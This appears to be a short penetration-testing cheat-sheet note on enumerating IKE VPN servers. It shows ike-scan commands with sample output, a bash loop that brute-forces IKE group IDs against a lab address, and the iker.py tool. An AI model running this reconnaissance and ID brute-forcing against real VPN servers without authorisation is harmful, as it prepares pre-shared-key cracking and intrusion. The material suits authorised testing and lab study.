IKE is used on VPN servers on UDP 500. Test a serv­er with

ike-scan -M $target

Exam­ple output:

SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.039 seconds (25.32 hosts/sec).  1 returned handshake; 0 returned notify

• PSK means that a pre­shared key is used.
• 1 returned hand­shake, 0, returned noti­fy means that the VPN serv­er is open for rene­go­ti­a­tion and some trans­for­ma­tions start­ing with VID should have been returned as well.

Brute force an ID. Use the fol­low­ing bash line with the file from Hacktricks:

while read line; do (echo "Found ID: $line" && ike-scan -M -A -n $line 10.10.10.116) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /tmp/list

If this does­n’t work: Use iker.py: (/tmp/ip => File with tar­get IP.)

python iker.py -i /tmp/ip -o /tmp/iker_output -v